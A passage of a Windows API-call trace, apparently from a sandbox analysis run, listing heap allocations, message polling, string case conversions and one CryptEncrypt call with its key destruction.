(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0257.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c08 [0257.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c48 [0257.963] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0257.963] CryptEncrypt (in: hKey=0xaa5820, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24dd3e0*, pdwDataLen=0x8bef68*=0xc87b, dwBufLen=0xc880 | out: pbData=0x24dd3e0*, pdwDataLen=0x8bef68*=0xc880) returned 1 [0257.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0257.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0257.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0257.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0257.964] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0257.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0257.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0257.965] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0257.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0257.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0257.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0257.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0257.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0257.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0257.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0257.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0257.965] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.965] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a18 [0257.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0257.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0257.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0257.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0257.965] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0257.965] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0257.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0257.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0257.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0257.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f200 [0257.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0257.966] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0257.967] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0257.967] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0257.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0257.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0257.967] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0257.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0257.967] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0257.967] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.967] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0257.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0257.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0257.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0257.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0257.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0257.968] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0257.968] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.968] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0257.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1738 [0257.968] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0257.968] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0257.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0257.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0257.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0257.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0257.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0257.968] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0257.968] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0257.968] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0257.968] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0257.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0257.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0257.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0257.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0257.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0257.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0257.969] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0257.969] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0257.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0257.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0257.969] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0257.969] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0257.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0257.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0257.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0257.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0257.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0257.969] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0257.969] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0257.969] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0257.970] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0257.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0257.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0257.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0257.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0257.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0257.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0257.970] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.970] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0257.970] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0257.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1738 [0257.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0257.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0257.970] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0257.974] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0257.974] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.974] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0257.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0257.974] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0257.976] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0257.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0257.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0257.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0257.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0257.976] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0257.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2ba8 [0257.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0257.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0257.976] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0257.976] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0257.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0257.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17a8 [0257.976] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0257.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0257.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0257.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0257.977] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0257.977] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0257.977] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0257.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0257.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0257.977] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0257.977] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0257.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0257.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0257.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0257.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0257.977] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0257.977] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0257.977] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0257.977] PeekMessageW (in: lpMsg=0x8bedb8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bedb8) returned 0 [0257.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0257.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0257.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab68 [0257.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0257.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0257.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0257.978] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0257.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0257.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0257.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0257.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7d8 [0257.978] CryptDestroyKey (hKey=0xaa5820) returned 1 [0257.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0257.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0257.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0257.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0257.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0257.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0257.978] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0257.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0257.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0257.978] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0257.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0257.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0257.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0257.979] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2658 [0257.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0257.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2658 | out: hHeap=0x25c0000) returned 1 [0257.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0257.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0257.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7d8 | out: hHeap=0x25c0000) returned 1 [0257.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0257.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0257.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0257.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0257.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0257.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0257.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0257.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0257.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0257.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0257.979] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0257.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0257.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0257.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0257.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0257.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0257.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0257.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0257.980] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0257.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0257.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0257.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0257.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0257.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0257.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0257.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17a8 [0257.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0257.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0257.980] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0257.980] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0257.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0257.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa60 [0257.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0257.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dc8 [0257.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0257.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dc8 | out: hHeap=0x25c0000) returned 1 [0257.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0257.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17a8 | out: hHeap=0x25c0000) returned 1 [0257.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0257.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0257.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0257.981] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0257.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0257.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0257.981] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0257.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0257.981] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0257.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaad8 [0257.981] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0257.981] PeekMessageW (in: 